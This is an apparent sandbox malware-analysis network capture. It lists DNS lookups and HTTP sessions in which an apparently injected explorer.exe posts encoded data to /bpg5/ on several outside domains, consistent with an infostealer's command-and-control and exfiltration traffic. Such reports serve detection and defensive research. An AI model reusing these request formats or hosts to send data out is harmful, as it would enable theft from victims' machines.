                                        May 23, 2023 09:40:09.375304937 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375325918 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375333071 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375355005 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375365973 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375382900 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375396013 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375413895 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375421047 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375444889 CEST8049735118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:09.375454903 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:09.375480890 CEST4973580192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:10.762887001 CEST4973680192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:11.041559935 CEST8049736118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:11.041884899 CEST4973680192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:11.435422897 CEST4973680192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:11.713074923 CEST8049736118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:11.765084028 CEST8049736118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:11.765109062 CEST8049736118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:11.765302896 CEST4973680192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:11.917325020 CEST4973680192.168.2.5118.27.125.172
                                        May 23, 2023 09:40:12.195600033 CEST8049736118.27.125.172192.168.2.5
                                        May 23, 2023 09:40:17.213845015 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:17.494138956 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.494445086 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:17.494445086 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:17.774204016 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.774301052 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.776258945 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.776329994 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.776369095 CEST8049737183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:17.776407003 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:17.776452065 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:19.006445885 CEST4973780192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:20.019493103 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:23.034348965 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:23.319118023 CEST8049738183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:23.319315910 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:23.319513083 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:23.602886915 CEST8049738183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:23.604749918 CEST8049738183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:23.604821920 CEST8049738183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:23.604846001 CEST8049738183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:23.604932070 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:23.609806061 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:34.239181042 CEST4973880192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:35.254563093 CEST4973980192.168.2.5183.90.228.46
                                        May 23, 2023 09:40:35.539021969 CEST8049739183.90.228.46192.168.2.5
                                        May 23, 2023 09:40:35.539187908 CEST4973980192.168.2.5183.90.228.46

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 23, 2023 09:39:05.375893116 CEST6145253192.168.2.58.8.8.8
                                        May 23, 2023 09:39:05.419783115 CEST53614528.8.8.8192.168.2.5
                                        May 23, 2023 09:39:15.504014969 CEST5148453192.168.2.58.8.8.8
                                        May 23, 2023 09:39:15.540699005 CEST53514848.8.8.8192.168.2.5
                                        May 23, 2023 09:39:25.700720072 CEST6344653192.168.2.58.8.8.8
                                        May 23, 2023 09:39:25.768717051 CEST53634468.8.8.8192.168.2.5
                                        May 23, 2023 09:39:37.219172955 CEST5675153192.168.2.58.8.8.8
                                        May 23, 2023 09:39:37.261522055 CEST53567518.8.8.8192.168.2.5
                                        May 23, 2023 09:39:47.531795979 CEST5503953192.168.2.58.8.8.8
                                        May 23, 2023 09:39:47.741574049 CEST53550398.8.8.8192.168.2.5
                                        May 23, 2023 09:39:53.464716911 CEST6097553192.168.2.58.8.8.8
                                        May 23, 2023 09:39:54.501853943 CEST6097553192.168.2.58.8.8.8
                                        May 23, 2023 09:39:54.530858040 CEST53609758.8.8.8192.168.2.5
                                        May 23, 2023 09:39:59.570380926 CEST5922053192.168.2.58.8.8.8
                                        May 23, 2023 09:39:59.758629084 CEST53592208.8.8.8192.168.2.5
                                        May 23, 2023 09:40:04.228899956 CEST5506853192.168.2.58.8.8.8
                                        May 23, 2023 09:40:04.491764069 CEST53550688.8.8.8192.168.2.5
                                        May 23, 2023 09:40:16.942764997 CEST5668253192.168.2.58.8.8.8
                                        May 23, 2023 09:40:17.212713957 CEST53566828.8.8.8192.168.2.5

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        May 23, 2023 09:39:05.375893116 CEST192.168.2.58.8.8.80xd475Standard query (0)www.berlinhealthweek.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:15.504014969 CEST192.168.2.58.8.8.80xe6a1Standard query (0)www.musicandgros.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:25.700720072 CEST192.168.2.58.8.8.80xbd09Standard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:37.219172955 CEST192.168.2.58.8.8.80x9029Standard query (0)www.antalyabfe.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:47.531795979 CEST192.168.2.58.8.8.80x5347Standard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:53.464716911 CEST192.168.2.58.8.8.80x58bdStandard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:54.501853943 CEST192.168.2.58.8.8.80x58bdStandard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:59.570380926 CEST192.168.2.58.8.8.80xf765Standard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:40:04.228899956 CEST192.168.2.58.8.8.80x1e51Standard query (0)www.rt66omm.comA (IP address)IN (0x0001)false
                                        May 23, 2023 09:40:16.942764997 CEST192.168.2.58.8.8.80x1f2aStandard query (0)www.haynicorpon.bizA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        May 23, 2023 09:38:14.331329107 CEST8.8.8.8192.168.2.50xdc1dNo error (0)k-ring.k-9999.k-msedge.netk-9999.k-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        May 23, 2023 09:38:14.331329107 CEST8.8.8.8192.168.2.50xdc1dNo error (0)k-9999.k-msedge.net13.107.18.254A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:05.419783115 CEST8.8.8.8192.168.2.50xd475No error (0)www.berlinhealthweek.com130.185.109.77A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:15.540699005 CEST8.8.8.8192.168.2.50xe6a1No error (0)www.musicandgros.commusicandgros.comCNAME (Canonical name)IN (0x0001)false
                                        May 23, 2023 09:39:15.540699005 CEST8.8.8.8192.168.2.50xe6a1No error (0)musicandgros.com81.169.145.93A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:25.768717051 CEST8.8.8.8192.168.2.50xbd09No error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:37.261522055 CEST8.8.8.8192.168.2.50x9029No error (0)www.antalyabfe.com188.114.97.7A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:37.261522055 CEST8.8.8.8192.168.2.50x9029No error (0)www.antalyabfe.com188.114.96.7A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:47.741574049 CEST8.8.8.8192.168.2.50x5347No error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:54.530858040 CEST8.8.8.8192.168.2.50x58bdNo error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                        May 23, 2023 09:39:59.758629084 CEST8.8.8.8192.168.2.50xf765No error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                        May 23, 2023 09:40:04.491764069 CEST8.8.8.8192.168.2.50x1e51No error (0)www.rt66omm.com118.27.125.172A (IP address)IN (0x0001)false
                                        May 23, 2023 09:40:17.212713957 CEST8.8.8.8192.168.2.50x1f2aNo error (0)www.haynicorpon.biz183.90.228.46A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.berlinhealthweek.com
                                        • www.musicandgros.com
                                        • www.gomarketing.info
                                        • www.antalyabfe.com
                                        • www.jhg61.com
                                        • www.rt66omm.com
                                        • www.haynicorpon.biz

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549720130.185.109.7780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:05.449691057 CEST117OUTGET /bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm HTTP/1.1
                                        Host: www.berlinhealthweek.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 23, 2023 09:39:05.467688084 CEST117INHTTP/1.1 404 Not Found
                                        Server: nginx/1.6.2
                                        Date: Tue, 23 May 2023 07:39:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 168
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.54972281.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:15.563860893 CEST131OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.musicandgros.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.musicandgros.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 52 34 37 43 79 41 31 54 45 32 6c 65 6c 4c 36 6d 44 78 73 44 74 49 4e 36 61 43 79 6e 69 54 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 57 78 7a 4a 79 6e 6e 4c 45 46 58 43 71 47 58 6b 35 36 42 68 70 4a 5f 31 44 6c 38 43 65 6c 35 36 51 77 39 35 6f 49 4d 74 56 35 55 65 78 68 66 4f 6b 6d 74 42 44 38 57 37 39 48 71 63 33 4c 76 75 4e 6f 78 4e 6b 4b 7a 6e 37 74 51 28 63 58 4d 75 45 4a 75 45 68 44 56 6e 41 50 6f 6f 31 47 45 4e 5f 35 6f 6d 38 28 32 6e 53 76 76 72 51 4f 71 75 6c 46 63 78 46 68 6f 4d 36 6b 37 38 79 65 65 6e 6d 59 77 53 4a 70 41 35 6f 35 43 46 7a 61 35 79 65 47 5f 48 43 4f 70 79 69 6a 38 4c 56 59 36 4f 4d 73 4c 36 44 65 43 6c 52 72 66 73 57 67 71 77 50 61 5a 66 49 36 43 6a 7a 76 45 7e 43 75 33 74 37 4d 4a 30 54 36 46 76 39 73 36 52 70 6e 79 69 5f 73 51 5a 76 77 73 73 57 72 69 78 6e 36 48 47 39 33 6b 42 41 49 66 46 73 55 70 35 43 67 53 65 5f 68 50 65 6d 32 5a 30 33 37 46 77 6e 4e 52 33 44 78 42 66 2d 69 57 46 36 45 46 7a 78 48 5f 42 55 6d 43 69 71 45 53 48 79 61 57 6f 44 54 78 77 47 42 4f 67 37 49 79 54 6d 4d 53 7e 33 37 67 72 75 57 38 45 4c 4e 71 77 59 51 49 4e 65 58 54 57 76 37 31 62 54 6c 71 5a 66 31 50 72 44 35 50 6d 38 55 68 50 78 36 61 48 47 71 61 79 73 70 49 32 76 39 5a 71 37 5a 31 68 46 32 6c 74 33 66 73 65 4c 28 6c 7a 6f 28 4e 30 4e 28 57 6b 4f 47 5f 4a 36 36 41 69 77 6c 54 66 54 35 44 59 2d 66 77 62 6c 61 41 52 73 7a 73 4e 76 31 45 4e 47 4e 6a 66 56 49 4f 6c 53 77 6b 70 6a 66 44 54 5f 48 41 69 47 4c 6e 34 5a 33 6c 72 57 75 78 54 4a 56 4e 43 66 58 52 61 78 61 70 49 4e 48 6c 61 4a 34 36 6e 48 35 61 54 67 53 67 6c 63 52 49 61 74 28 71 61 53 72 36 37 6c 6a 59 71 74 57 57 38 2d 33 47 41 50 56 72 73 78
                                        Data Ascii: yDcF=jKc5GkmqQWJekDmjcSfAcgn2fq6Dle3OtzPR2QyTx2or25bp0CYB5rSZFNhej1JopUz0Vvn1yE2zgMRiVgYLBFSlq7(qew7kPmZR2Q59~7boXybxLT5RL7rLMVkU98NMEYJ6z9PogW8TUPrGpk80r0h5NTFKSBDewVp-zkbu4mRuHXoBatAl0ppMP30B2Z3ErwWmm2A9T0A-~pjSUh(JXLJ-bTKWjCNELx~kjWikEdlAr9vgaiAnE0YphEerXp2lXdw5EENSNhr1YLtmsVy7pToYR47CyA1TE2lelL6mDxsDtIN6aCyniTfS9851Czurpkyo996evdxyeJ7X5OASj_4nLl5EUbcvG2DKNH~C8v5OR6tX0B0ycKDWkJALqwPWn1gDDeg-vSgOeU(AKgBVKHpOd_8A(OVleVAvn230TO0lRQl7iv7an65ymhwdpr93QN342uT97PP_~AS3WsMWT9UlRukXIEjL~WsIhsCQOGETxqlDOiPyL7d2MgyCzZD8J9cvh6se6BtoQFDvtWKstt3x98IXI5Y6EQyGr3aeBdAmPxtb0plJMKVsqlaBul0-sGT3y-I4glyoguqO4TmOBHfOcrFv9hm1q09xJg(d58EgMba7JOqkaltrCBxYBJFX2MegLp8s1wRN(NlSqD9coyFkG373UROtFMMfmO482rJvhmpV~fPqz5SxUqVQccQQV4ATUzbbKJnkJ-wY~nhI2-VKIaP0HLFk6k8ZHMR1(FDN87kGq5ERvix-lmPleELzxgXzzypjChrFShI8p0OQ84vb1BCdT1WX3QFbsjQcMszssOpuhar_LQZDhvPTQupLokr9PGnXVceu4H~fAROl2qnv1WxzJynnLEFXCqGXk56BhpJ_1Dl8Cel56Qw95oIMtV5UexhfOkmtBD8W79Hqc3LvuNoxNkKzn7tQ(cXMuEJuEhDVnAPoo1GEN_5om8(2nSvvrQOqulFcxFhoM6k78yeenmYwSJpA5o5CFza5yeG_HCOpyij8LVY6OMsL6DeClRrfsWgqwPaZfI6CjzvE~Cu3t7MJ0T6Fv9s6Rpnyi_sQZvwssWrixn6HG93kBAIfFsUp5CgSe_hPem2Z037FwnNR3DxBf-iWF6EFzxH_BUmCiqESHyaWoDTxwGBOg7IyTmMS~37gruW8ELNqwYQINeXTWv71bTlqZf1PrD5Pm8UhPx6aHGqayspI2v9Zq7Z1hF2lt3fseL(lzo(N0N(WkOG_J66AiwlTfT5DY-fwblaARszsNv1ENGNjfVIOlSwkpjfDT_HAiGLn4Z3lrWuxTJVNCfXRaxapINHlaJ46nH5aTgSglcRIat(qaSr67ljYqtWW8-3GAPVrsxbPdIkl4N1PBpZMsLh2B1fNa6nkjhY49PXS9P2al0s2zc2f9WDihS0dHSlAsnn2Gqy2T71QPVT9YxoLUisD61Yr8mfvcEiSYhOL5b31cH8PNXIuuTQq3Q).
                                        May 23, 2023 09:39:15.585316896 CEST132INHTTP/1.1 404 Not Found
                                        Date: Tue, 23 May 2023 07:39:15 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.549731150.129.40.980C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 23, 2023 09:39:47.958600044 CEST149OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.jhg61.com
                                        Connection: close
                                        Content-Length: 1482
                                        Cache-Control: no-cache
                                        Origin: http://www.jhg61.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.jhg61.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 79 44 63 46 3d 6b 4d 7a 56 7a 76 66 53 45 47 53 6f 36 5f 61 65 41 38 63 71 79 48 77 66 63 79 59 4b 6d 33 57 50 43 69 73 6a 51 72 47 64 6c 42 6c 56 64 37 41 75 78 6a 6e 67 54 44 48 4e 36 41 6b 70 75 77 30 56 78 52 7e 6f 70 55 64 49 70 4c 72 4c 59 53 48 47 68 57 41 4c 6d 7a 33 6b 63 49 77 75 53 65 66 63 77 6b 58 5f 6c 69 49 54 79 76 41 2d 73 75 58 61 79 4a 6b 41 34 2d 65 57 4b 4c 58 68 4c 68 48 46 59 47 79 73 52 66 47 63 41 4d 71 58 4d 56 6b 43 67 71 4a 57 42 49 7e 31 4e 71 41 70 51 41 35 42 52 74 46 6b 4d 75 51 61 47 37 59 69 45 54 56 32 6f 4e 54 41 77 5f 70 7a 52 5a 71 52 6d 4e 36 59 5a 33 67 48 74 34 6b 33 4e 57 75 49 50 72 38 77 70 61 70 7a 7a 43 35 36 6b 41 44 6d 46 59 32 53 55 64 78 7a 66 64 4a 34 30 43 64 7a 68 52 38 2d 76 48 59 66 38 59 36 74 78 64 45 33 62 49 42 48 61 69 33 73 62 52 34 6f 33 49 28 52 45 70 6d 66 39 72 69 73 67 49 57 53 39 53 73 59 59 50 4e 37 52 37 55 45 7e 73 56 4e 30 58 50 44 55 38 54 34 31 73 34 34 72 43 37 35 59 4e 71 69 37 68 71 54 67 39 4a 30 6c 56 71 57 50 59 41 76 55 64 4b 48 35 6a 71 39 41 51 32 6b 4d 4d 38 32 4a 6a 58 63 62 78 46 64 74 6b 34 43 6c 4e 37 45 43 46 46 30 31 6b 42 7a 53 67 47 61 59 53 55 6f 4f 36 62 55 47 61 31 77 30 6d 30 57 69 33 62 4c 30 77 68 46 74 68 42 62 36 42 34 33 4e 67 74 37 45 76 70 79 59 66 71 36 28 7a 28 44 6b 71 6d 41 57 38 57 30 50 77 6c 50 57 74 6d 53 35 57 32 52 56 49 7a 30 34 64 6a 67 6a 6d 4f 4b 59 4f 52 69 36 5a 37 42 4a 63 37 30 4b 5a 6e 5f 68 51 62 67 4a 74 61 68 46 2d 5a 6a 28 58 6c 41 6c 42 56 4d 35 63 52 53 6f 52 79 48 73 4c 78 52 36 41 4d 38 54 43 28 52 61 2d 59 62 56 58 36 72 57 45 67 51 74 75 6a 76 64 53 77 35 76 63 4a 6b 48 71 51 46 58 71 76 4f 36 42 54 62 7a 4e 38 49 7a 7a 6a 55 6a 70 6a 6c 38 72 44 48 4e 78 54 76 77 7a 6e 62 33 6f 78 4c 55 6e 45 72 45 67 38 54 43 30 28 30 56 36 6a 49 55 6d 55 58 37 6d 69 33 5a 50 44 73 7e 4d 64 6c 64 72 51 4d 43 35 4e 6b 65 65 6b 34 4f 73 71 6c 48 53 51 2d 37 76 56 6c 30 48 64 61 4b 44 47 65 32 32 55 74 4b 38 72 35 49 69 4d 36 52 6c 39 32 78 4e 76 35 72 68 77 39 4f 37 61 7a 58 55 73 33 37 55 41 5a 74 57 73 43 7a 6e 79 68 48 4b 65 46 4f 78 73 41 7a 31 75 79 53 76 4c 41 61 4e 4e 44 54 62 47 4c 51 38 4c 71 45 7a 6c 34 59 54 79 33 45 61 49 65 51 43 47 59 58 4d 32 77 7e 34 35 67 7e 45 6b 74 51 74 36 31 4d 63 35 4e 52 4e 59 61 30 63 66 62 79 39 79 49 6b 62 38 47 70 5f 61 41 61 67 38 39 57 31 61 33 6e 6c 4c 78 77 6d 43 47 6d 39 54 61 71 52 48 75 51 52 4b 52 38 30 44 2d 32 71 61 58 45 5f 6f 68 77 5f 75 4b 34 75 36 54 66 79 72 75 77 6e 58 4c 71 66 65 42 7e 6c 57 50 46 32 62 37 4d 59 47 45 34 47 63 73 35 56 54 57 32 7a 37 4c 4c 66 43 4f 32 37 73 45 74 65 43 33 33 76 43 54 31 57 6d 46 77 4d 4f 52 6f 62 68 71 7e 30 52 49 58 61 56 34 4b 57 4f 66 6b 68 41 77 69 56 49 70 6c 7a 72 7a 71 43 35 7a 74 52 44 55 37 43 33 33 6a 6e 38 58 36 55 45 5a 4a 35 59 35 55 55 4e 47 4e 7a 74 4e 31 61 62 39 79 5f 30 5a 36 30 73 68 48 30 67 33 4b 65 78 6c 53 2d 75 68 6c 56 59 63 65 50 6d 59 59 4b 41 36 51 74 4f 61 59 33 76 48 6f 53 44 6d 77 47 41 37 76 5a 79 4c 77 4a 70 58 69 7a 46 6b 4c 34 51 71 75 50 31 74 57 6b 6a 37 77 6e 28 70 6d 44 66 7a 75 45 4c 48 68 69 62 72 55 52 55 4f 57 47 54 69 4b 6e 7a 4e 43 73 72 74 72 54 42 78 58 47 47 65 78 52 49 54 54 75 32 4b 35 72 57 6b 56 35 51 44 4a 6a 4e 6c 57 79 61 46 69 68 51 68 70 7a 6d 39 4d 71 56 7a 66 55 41 4f 46 71 4f 78 4e 44 55 6d 4d 49 6c 2d 6a 47 6d 50 4f 6d 67 4e 30 64 75 2d 67 33 4b 55 72 77 46 43 71 4e 33 33 57 6a 6a 71 28 79 69 79 72 51 6f 70 4b 4a 4d 73 4d 2d 6f 38 53 45 48 62 6f 50 33 45 74 79 6a 76 39 67 77 38 50 7a 64 50 52 63 6f 63 76 31 4d 6f 6b 4a 41 2d 55 34 55 44 59 54 67 72 41 6f 6f 5f 46 4c 70 4b 34 5a 36 61 37 5a 6a 48 74 34 71 74 57 55 62 76 35 6d 76 45 72 6d 34 2d 61 68 4c 65 63 6d 4e 75 6c 38 6b 53 6a 34 58 44 68 32 56 76 75 75 4a 48 6d 5a 78 32 48 54 7a 6d 75 6b 4a 4f 70 6a 31 52 37 72 5a 42 34 42 56 49 77 38 30 41 4b 44 79 71 39 64 45 45 53 6b 57 30 59 59 37 61 31 67 41 7a 75 79 69 59 6e 46 4c 68 33 37 6f 79 74 38 33 49 61 63 71 76 6c 76 71 35 71 50 51 4b 33 54 42 57 56 48 69 52 42 57 78 2d 4b 64 43 64 49 4b 70 4d 35 63 42 79 59 66 58 65 63 4d 28 78 55 77 52 79 48 7a
